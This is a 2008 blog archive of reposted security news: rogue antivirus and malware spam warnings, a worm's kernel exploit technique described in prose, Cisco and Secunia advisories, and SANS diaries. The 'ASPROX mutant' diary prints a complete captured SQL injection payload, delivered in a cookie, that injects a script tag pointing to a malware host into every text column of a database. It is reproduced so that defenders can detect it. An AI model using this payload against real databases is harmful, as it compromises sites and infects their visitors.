September 2008 - Posts - Chris Mosby at myITforum.com

Really Legal Stuff - F-Secure Weblog

Really Legal Stuff
Posted by Sean @ 16:16 GMT | Comments

WinDefender 2008 is a rogue application. Rogues are also sometimes known as scareware.
Spyware Rogue : WinDefender 2008
Looks sort of familiar, doesn't it? Do you recognize the shape of the box?
The website creators appear to have "borrowed" a few things.
Let's check out the legal disclaimer.

Hey — Really Legal Stuff — That's impressive. From where else we can find really legal stuff?
Spyware Rogue : Antivirus XP 2008 : Really Legal Stuff
Oh, Antivirus XP 2008. That particular rogue is a huge pain in the… neck.
The guys that produce this stuff are crooks and swindlers.

Here's a tip: If they claim to be REALiable — they're probably FAKE.
P.S. Performing a search for "really legal stuff" produces some very interesting but definitely NOT safe for work results.
Avoid following the links.

Posted Tuesday, September 30, 2008 12:48 PM by cmosby | with no comments

Filed under: Security and Anti-Virus, Internet Explorer, Spam\Phishing, Cybercrime

Warning: Spam With Trend Micro Logo Delivers Trojan - TrendLabs Malware Blog

Sep29

Warning: Spam With Trend Micro Logo Delivers Trojan

by Eduardo Godinho (Threats Analyst)

While not as massive as earlier Web attacks that have used similar social engineering techniques, a new spamming operation has malware criminals using the logo of Trend Micro to lure unsuspecting Web users to “Trojanize” themselves.

Here’s a screenshot of a bogus email message that potential victims in Brazil have been receiving in the past several days:

Figure 1. Portuguese spam using the Trend Micro, Inc. logo

These messages, written in Portugese, inform the recipient that they contain pictures supposedly requested by those who received the mails themselves. The bogus “picture” purportedly available via download from a link found in the email body.

The message also carries the Trend Micro logo as a sort of “guarantee” to users that the file they are about to download is legitimate.

The link, when accessed, does not lead to any image file but installs a Trojan Horse program instead.

Users are perpetually reminded to be careful in handling links in the messages they receive. Just the mere mention of an online security company or the appearance of its logo does not guarantee that the message and its contents are legitimate and not harmful to systems. Logos after all are easy to copy or fake.

Trend Micro Smart Protection Network already blocks the spammed email messages involved in this threat. It also protects users from TROJ_GENERIC by detecting the Trojan at the desktop level and by providing solutions for its removal.

Posted Tuesday, September 30, 2008 10:40 AM by cmosby | with no comments

Filed under: Security and Anti-Virus, Spam\Phishing

In The Virtual Crime World, Merrill Lynch Follows Wachovia’s Fate - TrendLabs Malware Blog

Sep29

In The Virtual Crime World, Merrill Lynch Follows Wachovia’s Fate

by Reuben Mercado (Technical Communications)

Financial crisis or no financial crisis, banks have emerged as social engineering standards. However, as floundering financial institutions take centerstage in the public’s consciousness, users may become more susceptible to banking-related ploys.

Less than a week ago, TrendLabs reported on a scheme targeting Wachovia, the fourth largest banking chain in the US. This time, an almost identical plot has been set using Merrill Lynch as bait. The storied firm has received a sizable amount of media attention lately due to its high-profile bailout by the Bank of America.

The spam email message may appear as such:

spam sample
Figure 1. Fake Merrill Lynch spam

While those on social engineering watch may expect a frenzied appeal to buck up security in the face of the financial crisis, this scheme actually comes off cool and collected.

Trend Micro Advanced Threats Researcher Ivan Macalintal notes the use of very long, legitimate-looking URLs contained in hyperlinks on the spammed email messages. “[We] haven’t seen this for quite some time. [It] looks legit in a way but [then], you have to dig deeper,” Ivan says.

Clicking on the links will result in the download of malware detected as BKDR_AGENT.AWAF. It compromises system security, possibly allowing a remote user to issue commands on the affected system. It also drops TROJ_ROOTKIT.FX which has rootkit capabilities, used to hide malicious files and processes to ensure memory residency. One may remember TROJ_ROOTKIT.FX as the same malware found in the recent Wachovia spam, denoting that this is possibly the working of the same malware author.

Posted Tuesday, September 30, 2008 9:57 AM by cmosby | with no comments

Filed under: Security and Anti-Virus, Internet Hacks, Spam\Phishing, Cybercrime

World War III Malware Spam - TrendLabs Malware Blog

Sep29

World War III Malware Spam

by Roderick Ordoñez (Technical Communications)

After fake sites, fake Antivirus, fake blogs, and fake forums, spammers plough on with fake news.

Threat analyst Juan Pablo Castro reports of spam announcing the declaration of World War III.

{Spam
Figure 1. Sample spam that warns of World War 3
{Spam
Figure 2. Another sample spam that warns of World War 3

The link provided points to a legitimate-looking CNN page with a video. However, users wishing to view this video are prompted to install an ActiveX Object:

{Screenshot}
Figure 3. Missing ActiveX object is actually a spyware

Note that CNN’s real URL is http://www.cnn.com.

The supposed ActiveX Object is actually malware, which Trend Micro detects as TSPY_BANCOS.JN. TSPY_BANCOS.JN, like all BANCOS variants, is an info stealer that monitors the browser of the affected system. It waits for the user to access certain banking-related Web sites, then spoofs the login pages of the bank Web site to steal sensitive account information.

The request to install an ActiveX Object is a popular ploy to spread malware these days, and this bogus ActiveX Object is yet another one designed to deceive the user to believe that he’s installing something useful.

Then again, use of sensational headlines is nothing new, and spammers are constantly churning their creative juices to invent the most inviting email subjects. Though Trend Micro products already block the malicious URL, the spam and the related malware through Smart Protection Network, users are advised to do the following for the next spam that finds it way to their inboxes:

Never reply. Never click. Never believe.

Posted Tuesday, September 30, 2008 9:52 AM by cmosby | with no comments

Filed under: Security and Anti-Virus, Internet Hacks, Spam\Phishing

Threats that come along with SNS websites - McAfee Avert Labs Blog

Threats that come along with SNS websites

Monday September 29, 2008 at 3:47 pm CST
Posted by Yang Zhang

Trackback

1. SNS websites introduced
With the Web 2.0 trend, more Social Networking Services (SNS) websites have become very popular. For example Facebook and Myspaces are well-known.

You can keep contact with others via SNS websites; you can find many many friends. Many people participate in small games, virtual applications and so on. Those SNS websites have millions of unique visitors per day. It is a platform used to share files, music, information and so on. Also the platforms are used to spread viruses and worms. If a attacker spread a virus, trojan or worm via SNS websites, then many many users can be infected in a short time, which could be disastrous.

In the following sections I will talk about how to reduce the threat that comes along with SNS websites.

2. SNS website lead to threats
Nowadays, more attackers utilize SNS websites. They can easily create a zombie network via an SNS website vulnerability. They can use harvested private information for financial gain.

3. General attack ways
Attackers maybe used the following methods of attack:
a) Exploit a server vulnerability
For example: buffer overflow, weak password, database vulnerability and so on.
b) Exploit a script vulnerability
For example: SQL injection, Cross-site scripting, upload file problem and so on. In general, Cross-site scripting attacks have a wide use. A CSS worm can be get million of user cookies in one hour; and also lead million of users to an infectious virus.
c) Exploit an ActiveX vulnerability
If an ActiveX vulnerability is present, attackers are likely to target it. In general, attackers exploit ActiveX overflow vulnerabilities to install malware.
d) Used of Social Engineering Fundamentals
It’s well-known that Users of SNS websites trust each other, so Social Engineering Fundamentals work well on SNS sites.

4. Attacks Case
a) Facebook and Myspace have had ActiveX-related vulnerabilities in the past.
b) In 2006, MySpace was hit by a XSS Worm. The worm uses a malicious QuickTime video.

Posted Tuesday, September 30, 2008 8:40 AM by cmosby | with no comments

Filed under: Security and Anti-Virus, Internet Applications

Patchbag: WinZip / MPlayer / RealWin SCADA vuln - SANS Internet Storm Center

Patchbag: WinZip / MPlayer / RealWin SCADA vuln

Published: 2008-09-29,
Last Updated: 2008-09-29 20:28:18 UTC
by Daniel Wesemann (Version: 1)

0 comment(s) digg_url = 'http://isc.sans.org/diary.html?storyid=5099&rss'; digg_title = 'Patchbag: WinZip / MPlayer / RealWin SCADA vuln'; digg_skin='compact'; digg_topic = 'security';

A couple patches: WinZip11 on W2000 GDIlib vulnerability: http://update.winzip.com/wz112sr1.htm and MPlayer Buffer Overflow: http://www.ocert.org/advisories/ocert-2008-013.html

Further, the RealFlex RealWin 2.0 SCADA system seems vulnerable to a remote unauthenticated buffer overflow. No patch yet. If you run this software on your SCADA, now is the time to double-check if you have port tcp/910 nicely filtered. Otherwise, soon enough, someone else will be checking for you....: http://www.securityfocus.com/archive/1/496759 and http://xforce.iss.net/xforce/xfdb/45465

Keywords: patches scada vulnerability

0 comment(s)

Posted Tuesday, September 30, 2008 8:38 AM by cmosby | with no comments

Filed under: Patch Management, Internet Applications, Security, Software Vulnerabilites

Facebook Mystery Friend? No, Malware. - TrendLabs Malware Blog

img {max-width:650px;width: expression(this.width > 650 ? 650: true);border-style:none; behavior: url(../iepngfix.htc); }

Sep25

Facebook Mystery Friend? No, Malware.

by Rex Sumo (Fraud Analyst)

Cyber criminals continue to use the popular social networking site Facebook to bait users.

A new threat follows the phishing operation that we blogged about just two weeks ago.

This current Facebook threat begins with the following spammed email message:

This bogus message tells recipients that a friend has added them to their social networking circle. Besides using a legitimate email address, the perpetrators also copied the format of the legitimate Facebook page.

All of the links found in the message body lead potential victims directly to the legitimate Facebook site, with the exception of the login button, which draws a blank page because of an intentionally incorrect URL format.

Potential victims who think the attachment reveals “their mysterious friend” may actuially be tricked into opening it.

The attached .ZIP file supposedly contains a photo, but when unzipped it contains an executable named picture instead.

The .EXE file is a worm that Trend Micro detects as WORM_AUTORUN.EAT.

Interestingly, two notable worms (WORM_KOOBFACE.E and WORM_KOOBFACE.D) used Facebook a month ago in their propagation routines. The popularity of social networking sites are clearly targeted for cyber criminals who are intent on infecting more users.

The Trend Micro Smart Protection Network already blocks the spammed email message before it reaches our users’ inboxes. It also detects WORM_AUTORUN.EAT at the desktop level and provides solutions for the removal of the worm. Web users are advised to refrain from downloading attachments in unexpected email messages, as these attachments may prove harmful to their systems.

Posted Monday, September 29, 2008 3:46 PM by cmosby | with no comments

Filed under: Security and Anti-Virus, Internet Applications, Spam\Phishing, Cybercrime

A Different Twist on the Path to the Kernel - F-Secure Weblog

A Different Twist on the Path to the Kernel	Posted by Response @ 14:52 GMT \| postCount('00001507'); Comments

Now here's something we don't see every day.

It's an interesting twist on an old tactic — a worm that uses a local elevation of privilege vulnerability to access the kernel and execute code.

Most malware with rootkit functionality will tamper with the Windows kernel and attempt to execute code in kernel mode. Typically, a special driver is used to do this.

Worm.Win32.AutoRun.nox has a payload that restores the original function pointers back to the kernel's System Service Table (SST). The usual motivation for malware to do this is to remove any SST hooks installed by security software or other malware that might affect its successful operation.

As noted, normally a special driver or the physical memory device is used to get access to kernel-mode memory to restore the pointers. AutoRun.nox is different — it uses "GDI Local Elevation of Privilege Vulnerability (CVE-2006-5758)" to do the job. For malware, its rather unique to see such a technique being used.

This vulnerability is due to an error in handling a shared memory structure, which allows the structure to be remapped from read-only to writable. April 2007's update patched the vulnerability.

After remapping the memory, the malware will initialize a CPalette object. It will then search for the palette object in the shared kernel memory structure. Since the memory is now writable, it can be altered to include a pointer to a special function that will remove any existing SST hooks. Finally, a call to GetNearestPaletteIndex will indirectly cause the function to be executed. Afterwards, the palette object is restored leaving no trace of the attack.

If attacking this vulnerability fails, the worm goes back to the tried-and-true "special driver" method. The driver is detected by us as Rootkit:W32/Agent.UG.

Either way, if the attack is successful, the machine is compromised as the attacker can access the kernel and execute code, or cause a denial of service.

This attack will only work on unpatched machines running without the latest updates. Microsoft ranks this vulnerability as Important and recommends that users apply the update immediately.

Foresight? From: http://technet.microsoft.com/en-us/library/cc750820.aspx

"With this new release, the Window Manager, GDI, and related graphics device drivers have been moved to the Windows NT Executive running in kernel mode."

Response team post by — Lordian, Kimmo, Antti ...and Mika

Posted Monday, September 29, 2008 10:57 AM by cmosby | with no comments

Filed under: Security and Anti-Virus, Patch Management, Microsoft Windows, Software Vulnerabilites

ASPROX mutant - SANS Internet Storm Center

ASPROX mutant

Published: 2008-09-29,
Last Updated: 2008-09-29 10:22:25 UTC
by Daniel Wesemann (Version: 1)

0 comment(s) digg_url = 'http://isc.sans.org/diary.html?storyid=5092&rss'; digg_title = 'ASPROX mutant'; digg_skin='compact'; digg_topic = 'security';

ISC reader Mike wrote in to share an interesting new twist on the ongoing SQL injections. What he found in his logs was the following

POST /removed.asp HTTP/1.1
Cookie: start=S end=Z%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCAST(0x44454....
Content-Type: application/x-www-form-urlencoded
Host: removed
Content-Length: 3
Expect: 100-continue
Connection: Keep-Alive

The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist. Mike was able to capture the full code block:

DECLARE @T varchar(255),@C varchar(255),@X varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name,b.xtype from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) and a.name<>'dtproperties' and a.id not in(select parent_obj
from sysobjects where xtype='d') OPEN Table_Cursor FETCH NEXT FROM
Table_Cursor INTO @T,@C,@X WHILE(@@FETCH_STATUS=0) BEGIN if (@X=167 or
@X=231) exec('alter table ['+@T+'] alter column ['+@C+']
varchar(1000);update ['+@T+'] set ['+@C+']=['+@C+']+''<script
src=hxxp://ytgw123:cn></script>''') else exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar(2000),['+@C+']))+''<script
src=hxxp://ytgw123:cn></script>''') FETCH NEXT FROM Table_Cursor INTO
@T,@C,@X END CLOSE Table_Cursor DEALLOCATE Table_Cursor

While this again looks reasonably similar to the earlier injections, we haven't seen this particular form before. The URL has been defanged above, but is still live. It dishes out a handful of exploits, and in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal). One of the exploits contains the string "I LOVE gameee TEAM". Well: We don't.

Please let us know if you see attempted SQL injection via cookies in your logs.

Keywords: malware SQL Injection

Posted Monday, September 29, 2008 9:58 AM by cmosby | with no comments

Filed under: Security and Anti-Virus, Internet Hacks, Internet Applications, Cybercrime, Enterprise Applications, Software Vulnerabilites

Firefox v2.0.0.17 and Thunderbird v2.0.0.17 release fixes vulnerabilities - SANS Internet Storm Center

Firefox v2.0.0.17 and Thunderbird v2.0.0.17 release fixes vulnerabilities

Published: 2008-09-26,
Last Updated: 2008-09-26 20:01:11 UTC
by Patrick Nolan (Version: 1)

0 comment(s)

Firefox 2 v2.0.0.17 is available for download and corrects the vulnerabilities listed at "Security Advisories for Firefox 2.0 - Fixed in Firefox 2.0.0.17". "Firefox 2.0.0.x will be maintained with security and stability updates until mid-December, 2008. All users are strongly encouraged to upgrade to Firefox 3".

Thunderbird 2 v2.0.0.17 is available for download and corrects the vulnerabilities at "Security Advisories for Thunderbird 2.0 - Fixed in Thunderbird 2.0.0.17".

Thanks Raul!

Posted Friday, September 26, 2008 10:21 PM by cmosby | with no comments

CISCO bi-annual patch day - SANS Internet Storm Center

CISCO bi-annual patch day

Published: 2008-09-25,
Last Updated: 2008-09-26 03:16:41 UTC
by donald smith (Version: 1)

0 comment(s) digg_url = 'http://isc.sans.org/diary.html?storyid=5078&rss'; digg_title = 'CISCO bi-annual patch day '; digg_skin='compact'; digg_topic = 'security';

With the numerous CISCO vulnerabilities announced today we thought you might appreciate a table summarising the issues.

The table shows that many of the issues have a work around. Unfortunately, typically this is in the form of disabling the functionality which may not be an option for many of you. CISCO uses the CVSS scoring system which relates the score to the core Confidentiality, Integrity and Availability principles. The higher the score the more important the vendor believes the issue is.

#	Impact/CVE(s)	Exploit	Cisco Rating		Workaround/Fix	ISC Rating*
			Base	Temp
cisco-sa-20080924-iosips	The Cisco IOS Intrusion Prevention System (IPS) feature contains a vulnerability in the processing of certain IPS signatures that use the SERVICE.DNS engine. This vulnerability may cause a router to crash or hang, resulting in a denial of service condition.
	IOS IPS CVE-2008-2739	none known	7.8	6.4	Y/Y	Critical
Handler Comments CISCO IDS is not affected
cisco-sa-20080924-ssl	A Cisco IOS device may crash while processing an SSL packet. This can happen during the termination of an SSL-based session. The offending packet is not malformed and is normally received as part of the packet exchange. Disable services (secure-server, webvpn, or OSP settlement) Limit exposure via ACL
	IOS SSL CVE-2008-3798	none Known	7.8	6.4	Y/Y	Critical
Handler Comments This affects managed using SSL as well. The workaround will disable this.
cisco-sa-20080924-sip	Multiple vulnerabilities exist in the Session Initiation Protocol (SIP) implementation in Cisco IOS that can be exploited remotely to trigger a memory leak or to cause a reload of the IOS device. Disable services if not needed or limit exposure via ACL
	DOS CVE-2008-3800 CVE-2008-3801 CVE-2008-3802	none known	7.8	6.4	Y/Y	Important
Handler Comments SIP can use UDP -> the src_IP is spoofable which may negate the effects of an ACL intended to limit your exposure.
cisco-sa-20080924-cucm	Cisco Unified Communications Manager, formerly Cisco Unified CallManager, contains two denial of service (DoS) vulnerabilities in the Session Initiation Protocol (SIP) service. An exploit of these vulnerabilities may cause an interruption in voice services.
	DOS CVE-2008-3800 CVE-2008-3801	None known	7.1 7.8	5.9 6.4	Y/Y	Critical
Handler Comments SIP can use UDP -> the src_IP is spoofable which may negate the effects of an ACL intended to limit your exposure. Can be triggered with valid SIP msgs. CUCM Versions > 5.x have SIP enabled by default and it can not be disabled.
cisco-sa-20080924-vpn	Devices running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4 and configured for Multiprotocol Label Switching (MPLS) Virtual Private Networks (VPNs) or VPN Routing and Forwarding Lite (VRF Lite) and using Border Gateway Protocol (BGP) between Customer Edge (CE) and Provider Edge (PE) devices may permit information to propagate between VPNs
	Data Leak CVE-2008-3803	none known	5.1	4.3	Y/Y	Important
Handler Comments A bug exists when processing extended communities with MPLS VPNs. If extended communities are used, MPLS VPN may incorrectly use a corrupted route target (RT) to forward traffic. If this occurs, traffic can leak from one MPLS VPN to another
cisco-sa-20080924-mfi	Cisco IOS Software Multi Protocol Label Switching (MPLS) Forwarding Infrastructure (MFI) is vulnerable to a Denial of Service (DoS) attack from specially crafted packets. Only the MFI is affected by this vulnerability. Older Label Forwarding Information Base (LFIB) implementation, which is replaced by MFI, is not affected.
	DOS CVE-2008-3804	None known	7.8	6.4	N/Y	Critical
Handler Comments An attacker needs to have access to the MPLS network through an MPLS-enabled interface. MPLS packets are dropped on interfaces that are not configured for MPLS. No workaround.
cisco-sa-20080924-ipc	Cisco 10000, uBR10012 and uBR7200 series devices use a User Datagram Protocol (UDP) based Inter-Process Communication (IPC) channel that is externally reachable. An attacker could exploit this vulnerability to cause a denial of service (DoS) condition on affected devices. Filter packets that are sent to 127.0.0.0/8 and towards UDP port 1975
	DOS CVE-2008-3805	None known	8.5	7	Y/Y	Critical
Handler Comments An attacker needs to get a packet with destination address in the 127./8 range to the router which implies directly connected or use of a default route.
cisco-sa-20080924-ubr	Cisco uBR10012 series devices automatically enable Simple Network Management Protocol (SNMP) read/write access to the device if configured for linecard redundancy. This can be exploited by an attacker to gain complete control of the device Change Community String
	DOS CVE-2008-3807	None known	10	8.3	Y/Y	PATCH NOW
Handler Comments When linecard redundancy is enabled on a Cisco uBR10012 series device, SNMP is also automatically enabled with a default community string of private that has read/write privileges. Since there are no access restrictions on this community string, it may be exploited by an attacker to gain complete control of the device. SNMP can use UDP -> the src_IP is spoofable which may negate the effects of an ACL intended to limit your exposure.
cisco-sa-20080924-multicast	Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition Specify trusted PIM neighbors AND/or enable infrastructure acls to limit exposure
	DOS CVE-2008-3809	none known	7.8	6.4	Y/Y	PATCH NOW
Handler Comments PIM src_IP is spoofable which may negate the effects of an ACL intended to limit your exposure
cisco-sa-20080924-sccp	A series of segmented Skinny Call Control Protocol (SCCP) messages may cause a Cisco IOS device that is configured with the Network Address Translation (NAT) SCCP Fragmentation Support feature to reload.
	DOS CVE-2008-3810 CVE-2008-3811	None known	7.8	6.4	Y/Y	PATCH NOW
Handler Comments Infrastructure acls and on device acl’s should be viable mitigations but are not mentioned in the cisco advisory. Moving the port from the default of 2000 would also make this a bit harder to exploit. You would need to modify the port on both the call manager and the IOS device supporting sccp.
cisco-sa-20080924-iosfw	Cisco IOS software configured for IOS firewall Application Inspection Control (AIC) with a HTTP configured application-specific policy are vulnerable to a Denial of Service when processing a specific malformed HTTP transit packet. Successful exploitation of the vulnerability may result in a reload of the affected device.
	DOS CVE-2008-3812	None known	7.8	6.4	N/Y	PATCH NOW
Handler Comments No workaround other than disabling HTTP Deep Packet Inspection
cisco-sa-20080924-l2tp	Several features enable the L2TP mgmt daemon process within Cisco IOS software, including but not limited to Layer 2 virtual private networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack Group Bidding Protocol (SGBP) and Cisco Virtual Private Dial-Up Networks (VPDN). Once this process is enabled the device is vulnerable. Enable infrastructure acls to limit exposure
	DOS CVE-2008-3813	None known	7.8	6.4	Y/Y	Critical
Handler Comments L2TP can use UDP -> the src_IP is spoofable which may negate the effects of an ACL intended to limit your exposure.

(*): ISC rating

We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Happy Patching

Don & Mark

Posted Friday, September 26, 2008 4:20 PM by cmosby | with no comments

Filed under: Patch Management, Internet Applications, Security, Enterprise Applications, Software Vulnerabilites, Hardware Vulnerabilities

News from the "Well DUH!!!" category

From the SANS NewsBites newsletter today:

--Researchers Find Users Often Click Through Dialog Windows Without Reading (September 23 & 25, 2008) An experiment conducted by psychologists at North Carolina State University found that computer users often fail to distinguish fake Windows dialog boxes from legitimate ones. Sixty-three percent of the

42 students participating in the experiment clicked OK whenever a pop-up window appeared, ignoring anomalies that should have clued them in to the potential for malicious activity. The subjects appeared to view pop-up windows as hindering their intended activity; clicking the OK button is the virtual equivalent of brushing away flies.

http://www.networkworld.com/news/2008/092508-computer-users-overeager-to-click.html?hpg1=bn

http://arstechnica.com/news.ars/post/20080923-study-confirms-users-are-idiots.html

[Editor's Note (Schultz): This research confirms the obvious, but it nevertheless significant in that it provides controlled, experimental data that shed some light on the magnitude of the problem of users clicking OK just to get rid of security related dialog boxes that pop up.]

Posted Friday, September 26, 2008 3:37 PM by cmosby | with no comments

Filed under: In the News, Security

Cisco Unified Communications Manager SIP Denial of Service Vulnerabilities

Secunia Advisory: SA32013 Release Date: 2008-09-25 Popularity: 307 views
Critical:

Moderately critical Impact: DoS
Where: From remote Solution Status: Unpatched
Software:Cisco Unified CallManager 4.x
Cisco Unified Communications Manager 5.x
Cisco Unified Communications Manager 6.x

Subscribe: Instant alerts on relevant vulnerabilities

CVE reference:CVE-2008-3800
CVE-2008-3801

Description:
Some vulnerabilities have been reported in Cisco Unified Communications Manager, which can be exploited by malicious people to cause a DoS (Denial of Service).

Multiple unspecified errors exist in the processing of SIP messages, which can be exploited to cause a reload of an affected device.

This is related to vulnerability #5 in:
SA31990

The following versions are affected:
* Cisco Unified CallManager 4.1 versions prior to 4.1.3SR8
* Cisco Unified CallManager 4.2 versions prior to 4.2(3)SR4b
* Cisco Unified CallManager 4.3 versions prior to 4.3(2)SR1a
* Cisco Unified Communications Manager 5.x versions prior to 5.1(3d)
* Cisco Unified Communications Manager 6.x versions prior to 6.1(2)su1

Solution:
The vendor will release updated versions that fix these vulnerabilities (please see vendor advisory for details).

Restrict network access to the affected services.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml

Other References:
SA31990
http://secunia.com/advisories/31990/

Posted Thursday, September 25, 2008 3:08 PM by cmosby | with no comments

Filed under: Patch Management, Internet Applications, Security, Enterprise Applications, Software Vulnerabilites, Hardware Vulnerabilities

Cisco IOS Multiple Vulnerabilities - Secunia

Cisco IOS Multiple Vulnerabilities

Secunia Advisory: SA31990 Release Date: 2008-09-25 Popularity: 720 views
Critical:

Moderately critical Impact: Exposure of sensitive information
DoS
System access
Where: From remote Solution Status: Vendor Patch
OS:Cisco IOS 12.x
Cisco IOS R12.x

Subscribe: Instant alerts on relevant vulnerabilities

CVE reference:CVE-2008-2739
CVE-2008-3798
CVE-2008-3799
CVE-2008-3800
CVE-2008-3801
CVE-2008-3802
CVE-2008-3803
CVE-2008-3804
CVE-2008-3805
CVE-2008-3807
CVE-2008-3808
CVE-2008-3809
CVE-2008-3810
CVE-2008-3811
CVE-2008-3812
CVE-2008-3813

Description:
Some vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious people to disclose sensitive information, cause a DoS (Denial of Service), or to compromise a vulnerable system.

1) An unspecified error exists in the processing of SSL packets during the termination of an SSL session, which can potentially be exploited to crash an affected system.

2) Two unspecified errors exist within the processing of Protocol Independent Multicast (PIM) packets, which can be exploited to cause an affected device to reload.

3) Unspecified errors within the processing of segmented Skinny Call Control Protocol (SCCP) messages can be exploited to cause a Cisco IOS device to reload.

Successful exploitation requires that the device is configured with Network Address Translation (NAT) SCCP Fragmentation Support.

4) A memory leak in the processing of Session Initiation Protocol (SIP) messages can be exploited to cause a DoS for all voice services.

5) Multiple unspecified errors exist in the processing of SIP messages, which can be exploited to cause a reload of an affected device.

6) An unspecified error in the IOS Intrusion Prevention System (IPS) feature when processing certain IPS signatures that use the SERVICE.DNS engine can be exploited to cause a DoS via specially crafted network traffic.

7) A security issue exists in the processing of extended communities with Multi Protocol Label Switching (MPLS) Virtual Private Networks (VPN), which can lead to traffic leaking from one MPLS VPN to another.

This security issue does not affect Cisco IOS releases based on 12.1.

NOTE: This security issue was introduced with CSCee83237. Cisco IOS images that do not include CSCee83237 are reportedly not affected.

8) An unspecified error within the Multi Protocol Label Switching (MPLS) Forwarding Infrastructure (MFI) can be exploited to cause a DoS via specially crafted network packets.

Successful exploitation requires access to the MPLS network.

9) An unspecified error within the Application Inspection Control (AIC) can be exploited to cause a reload of an affected device via specially crafted HTTP packets.

10) An unspecified error in the processing of Layer 2 Tunneling Protocol (L2TP) packets can be exploited to cause an affected device to reload via a specially crafted L2TP packets.

Successful exploitation requires that the L2TP mgmt daemon process is running. This process may be enabled e.g. via Layer 2 virtual private networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack Group Bidding Protocol (SGBP), or Cisco Virtual Private Dial-Up Networks (VPDN).

11) An unspecified error exists in the processing of IPC messages. This can be exploited to reload an affected device via a specially crafted UDP packet sent to port 1975.

This vulnerability is reported in Cisco 10000, uBR10012, and uBR7200 series devices.

12) A security issue is caused due to the device automatically enabling SNMP with a default community string, which can be exploited to gain control an affected system.

Successful exploitation requires that a device is configured for linecard redundancy.

This vulnerability affects Cisco uBR10012 series devices running IOS.

Solution:
Update to the fixed version (please see the vendor's advisories for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml

Posted Thursday, September 25, 2008 2:47 PM by cmosby | with no comments

Filed under: Patch Management, Internet Applications, Security, Enterprise Applications, Software Vulnerabilites, Hardware Vulnerabilities

Flurry of Security Advisories from CISCO - SANS Internet Storm Center

Flurry of Security Advisories from CISCO

Published: 2008-09-24,
Last Updated: 2008-09-24 18:43:56 UTC
by Deborah Hale (Version: 1)

0 comment(s) digg_url = 'http://isc.sans.org/diary.html?storyid=5075&rss'; digg_title = 'Flurry of Security Advisories from CISCO '; digg_skin='compact'; digg_topic = 'security';

Cisco has released a number of Security Advisories for numerous products and IOS's today. We are in the process of reviewing the advisories and will post a recap later. For now you can take a look at the advisories at CISCO's website at:

www.cisco.com/en/US/products/products_security_advisories_listing.html.

Keywords: CISCO Security Advisory

0 comment(s)

Posted Thursday, September 25, 2008 1:55 PM by cmosby | with no comments

Filed under: Patch Management, Security, Enterprise Applications, Software Vulnerabilites, Hardware Vulnerabilities

Chris Mosby at myITforum.com

Search

Tags

News

Unique Visitors

Navigation

Archives

Microsoft Links

SMS Links

Great Blogs

My Links

Security Links

Anti-Virus Links

Things I Have Done or I Am Involved In

Published Works